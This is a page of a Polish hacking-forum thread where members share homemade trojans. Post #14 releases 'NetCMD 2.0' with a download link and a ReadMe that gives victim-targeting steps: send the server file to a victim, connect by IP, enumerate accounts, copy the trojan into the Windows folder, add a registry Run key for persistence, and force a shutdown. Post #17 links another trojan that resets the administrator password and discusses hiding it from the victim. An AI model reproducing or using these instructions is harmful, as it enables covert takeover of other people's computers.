Strona 2 z 2 PierwszyPierwszy 12
Pokaż wyniki 11 do 20 z 20

Temat: NetCMD

  1. #11
    Zarejestrowany
    Oct 2007
    Postów
    39

    Exclamation

    Jednak większość osób posiada go wgranego
    Czy ja wiem. Właśnie odkryłem, że osobiście go nie mam. Może po prostu zrobić drugą, wiekszą wersje tego programu z załadowanym już modułem o którym wspominał Exc0mmunion? Dla kogoś kto zna Delphi nie powinno to zająć duzo czasu (choć mogę się mylić, nie programuje w Delphi), a na pewno rozwiązałoby problemy wielu ludzi*

    *i bardziej chodzi mi tu o ofiarę, nie napastnika

  2. #12
    Avatar Exc0mmunion
    Exc0mmunion jest offline Superion
    Zarejestrowany
    Feb 2007
    Postów
    181

    Domyślnie

    Pamiętam parę lat temu pisałem jakiś program w delphi dla kogoś i owy problem występował. Na każdym kompie ,który nie miał zainstalowanego Borland Delphi Studio , nawet po zainstalowaniu tego i odinstalowaniu , problem sie pojawiał.
    Rozwiązanie jest banalne trzeba odpowiednie opcję zaznaczyć Opcje projektu -> Packages -> Build with runtime libraries czy jakoś tak, nie pamiętam dokładnie

    Pozdrawiam

    ps: dałbyś źródełka ?

  3. #13
    Zarejestrowany
    Oct 2007
    Postów
    17

    Domyślnie

    Wiem jak to zrobić
    Więc za niedługo opublikuję wersję 2
    Z runtime packeges

  4. #14
    Zarejestrowany
    Oct 2007
    Postów
    17

    Domyślnie

    Zapraszam do pobierania wersji 2.0!

    NetCMD V 2.0


    Do pobrania tutaj: http://www.sendspace.com/file/n6jdkf


    W nowej wersji między innymi:
    - wersja plików z runtime (na błąd braku rtl70.bpl i vcl70.bpl)
    - wbudowane polecenia, które ułatwiają i umożliwiają nowe opcje.


    Tutaj najnowszy plik ReadMe.txt jako opisik:
    Witaj w pliku ReadMe programu NetCMD V 2.0.

    Autor: Amidamaru.

    Oczekuje wszelakich komentarzy, uwag i propozycji! Mój mail: [email protected]



    PROGRAM STWORZONY DO CELÓW EDUKACYJNYCH.







    1. O plikach
    __________________________________________________ __________________________________________________ ________



    Program jest bardzo prostym programem do zdalnego zarządzania komputerem, bez świadomości drugiej strony - czyli poprostu trojanem

    NIEOTWIERAJ PLIKU srv.exe ! Jest to plik dla ofiary!
    Plik cli.exe natomiast służy do zdalnego sterowania.


    Największą zaletą programu jest pojemność:
    - plik srv.exe ma 8,5 kb [bez frameworka!]
    - plik cli.exe ma też 8,5 kb [bez frameworka!]
    Po spakowaniu razem mają 12,9 kb. [bez frameworka!]

    Przede wszystkim uzyskano taki wynik poprzez:
    - Spakowanie pliku srv.ex oraz cli.exe programem UPX w najlepszej możliwej kompresji
    - Spakowanie obu plików do archiwum RAR-a (pliki_dla_komputerow_z_frameworkiem.rar) o najwyższym stopniu kompresji

    Po dokładnym przeczytaniu pliku ReadMe.txt (czyli tego) i doshelp.txt możesz posługiwać się samym archiwum pliki_dla_komputerow_z_frameworkiem.rar lub pliki_dla_komputerow_bez_frameworka.rar.


    W wersji 2.0 znajdziesz dodatkowo archiwum pliki_dla_komputerow_bez_frameworka.rar , w którym znajdują się pliki także spakowane UPX-em o najwyższej kompresji. Jednak mają one po ok. 150 kb ze względu na to, że dźwigają frameworka.
    Jeżeli więc nie jesteś pewien co do obecnoście frameworka na komputerze swoim lub ofiary to używaj archiwum pliki_dla_komputerow_bez_frameworka.rar !

    Jak sprawdziś czy masz frameworka? Jeżeli przy uruchomieniu cli.exe lub srv.exe zobaczysz komunikat: "Uruchomienie tej aplikacji nie powiodło się, ponieważ nie znaleziono rtl70.bpl. Ponowne zainstalowanie..." lub "Uruchomienie tej aplikacji nie powiodło się, ponieważ nie znaleziono vcl70.bpl. Ponowne zainstalowanie..." lub podobny oznacza to, iż nie masz frameworka.

    Pamiętaj! Nie masz pewności czy Ty i ofiara macie frameworka? Używaj zawsze plików z archiwum pliki_dla_komputerow_bez_frameworka.rar!

    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_










    2. Zaczynamy!
    __________________________________________________ __________________________________________________ ________


    Program nie wymaga żadnej konfiguracji. Działa na stałym porcie i ma jednolitne ustawienia.
    Aby więc zacząć musisz tylko podesłać ofiarze plik srv.exe i poznać jej IP (np. poprzez Gadu-Gadu).
    Następnie odpalasz u siebie plik cli.exe. W pole IP: wpisujesz oczywiście IP ofiary i klikasz Enter.
    Czekasz na połączenie.
    Gdy zostaniesz połączony możesz już wykonywać zdalnie komendy na komputerze ofiary!

    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_










    3. Podstawy
    __________________________________________________ __________________________________________________ ________

    Od razu powiem, że program nie jest dla lamerów, którzy uważają się za wielkich haksi0rów :/ Nie ma tu żadnych fajnych zabaweczek. Czysta linia komend. Jednak bardziej doświadczeni zapewne wiedzą, że przez CMD można zrobić praktycznie WSZYSTKO!

    Moja propozycja jak zacząć wygląda tak:
    a) wpisjemy systeminfo, aby zobaczyć co w kompie gra
    b) wpisujemy net user, a potem net user Administrator, aby zorientować się jakie posiada konta oraz czy Administrator ma hasło i czy można je zmienić
    c) teraz proste copy "ścieżka_trojana" "C:\Windows\jakas_fajna_nazwa.exe", żeby skopiować naszego trojanika do folderu Windowsa
    d) czas dodać trojana do autostartu. Uzyskamy to za pomocą edytora rejestru pod CMD, wpisujemy: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NazwaWAutostarcie /t REG_SZ /d C:\Windows\NazwaPodJakaSkopiowalismyTrojana.exe . Od wersji 2.0 wystarczy też wpisać samo "/netcmd:autostart".

    Po tych czynnościach jesteśmy niejako "zabezpieczeni" i możemy kontynuować...


    Proszę przed wyłączeniem programu wpisać w linię komen ofiary polecenie exit lub /netcmd:exit !! (Inaczej proces CMD.EXE nie zostanie zakończony)
    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_











    4. Polecenia wbudowane
    __________________________________________________ __________________________________________________ ________

    Program NetCMD od wersji 2.0 posiada wbudowane opcje, które wpisujemy jako normalna komenda. Ułatwiają one lub umożliwiają niektóre funkcje. Oto ich lista:

    /netcmd:autostart - dodaje NetCMD do autostaru (serwer NetCMD będzie się uruchamiał z każdym uruchomieniem komputera ofiary) - wykonuje polecenie "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ShellExt /t REG_SZ /d srv.exe"
    /netcmd:exit - wpisuje exit w linię komend ofiary, zabija proces CMD.EXE na komputerze ofiary i wyłacza u niego serwer. Zawsze warto wykonać go dla bezpieczeństwa gdy chcemy się rozłączyć. Ta opcja automatycznie nas rozłączy błędem (jednak serwer wyłączy się poprawnie).
    /netcmd:disconnect - dezaktywuje serwer i rozłącza go.
    /netcmd:shutdown - zamyka komputer ofiary. Wykonuje polecenie "shutdown -s -t 1 -f".

    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_









    5. Postanowienia końcowe
    __________________________________________________ __________________________________________________ ________

    Pamiętaj, że mogę być problemy z połączeniem jeżeli ofiara:
    - znajduje się za NAT-em
    - posiada firewall (nawet czasem Windowsowy blokuje)
    - posiada antywirua z bardzo wysokim stopniem filtracji (może wykryć, że program był kompresowany, co czasami zostaje uznane za wirusa)

    Pamiętaj: używasz programu na własną odpowiedzialność

    Autor: AMIDAMARU.

    Licencja: freeware.
    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_





    LOGO NetCMD
    wersja 2.0


    By Amidamaru

  5. #15
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    wiec tak:
    - client nie dziala, musialem sie laczyc netcatem.
    - bledy, typu 2x wyswietlenie promptu
    - jesli przyjdzie 2 polaczenie, to hmm... sam lepiej zobacz
    soft nie przetestowany, duuuuzy rozmiar, czyli poprostu kolenjy tandetny trojan.

    Choc podoba mi sie sposob jego dzialania, jak sie postarasz to moze cos z tego bedzie. Dodaj bym polecenia *get i *put dzialajace na innych portach to transferu plikow. / jest znakiem katalogu, uzywaj czegos innego, np wlasnie *.

    ach to delphi
    Ostatnio edytowane przez 31337 : 10-25-2007 - 07:00

  6. #16
    Avatar kaspsior
    kaspsior jest offline يحشطخبؤءفنو٢٥٣كهي
    Zarejestrowany
    May 2007
    Postów
    406

    Domyślnie

    ..................... ...
    Ostatnio edytowane przez kaspsior : 04-17-2012 - 22:54

  7. #17
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    hmm, to ja mam cos podobnego, tyle ze nie w delphi a metoda łapu-capu w BATach plus MDtelnet, ma to swoje zalety:
    logowanie sie na konto administratora, czyli z prawami roota
    po uruchomieniu odrazu wpada do autostartu w rejestrze...
    laczy sie z nim przez zwykly telnet, na porcie telnetu...
    zmienia haslo administratora na 123456, by mozna sie na niego zalogowac

    niestety ma tez bugi:
    polecenie potwierdzamy 2x enter
    kiedy przychodzi do potwierdznia operacji "t" program wydaje sie nie dawac sobie z tym rady
    niestety przy uruchomieniu na ulamek sekundy pokazuje sie powloka, poprawilem to przez programik hiddex, ale okazalo sie ze nie dziala poprawnie.

    jest to polepione w winrarze i mozna by dodac opcje kasowania po instalacji, ale nie wiem czy to by nie wzbudzlo podejrzen ofiary, mozna terz dorzucic jakas gierke, cokolwiek, to sa juz opcje samego winrara sfx...

    http://www.minisx1.yoyo.pl/1/troy.exe



    "hałewer" moze zostac wykryty jako 'onclick worm' or stuff like that
    http://gogulas.yoyo.pl/h.gif

  8. #18
    Zarejestrowany
    Oct 2007
    Postów
    17

    Domyślnie

    yyy... ale to przecież logiczne, że nie można się 2 razy połączyć z jednym socketem xD

    po za tym to taki "mini-trojanik" bo szczeże mówiąc ReadMe.txt pisąłem dłużej niż tego trojana :P

    Ale przydaje sie



    Pozdro

  9. #19
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    yyy... ale to przecież logiczne, że nie można się 2 razy połączyć z jednym socketem xD
    listen(sock, 1);
    Czy ja mowie ze c+winapi jest duzo lepsze od delphi?

  10. #20
    Avatar Nikow
    Nikow jest offline -=[ZRP]=-
    Zarejestrowany
    Sep 2007
    Skąd
    Różne zakątki sieci.
    Postów
    995

    Domyślnie

    C rządzi Z jednym socketem na linuksie może być ponad 35000 połączeń Przykładem jest SSH, Telnet, Serwery HTTP, MySQL, POP3, POP, POP2 i wiele innych :d

Strona 2 z 2 PierwszyPierwszy 12

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj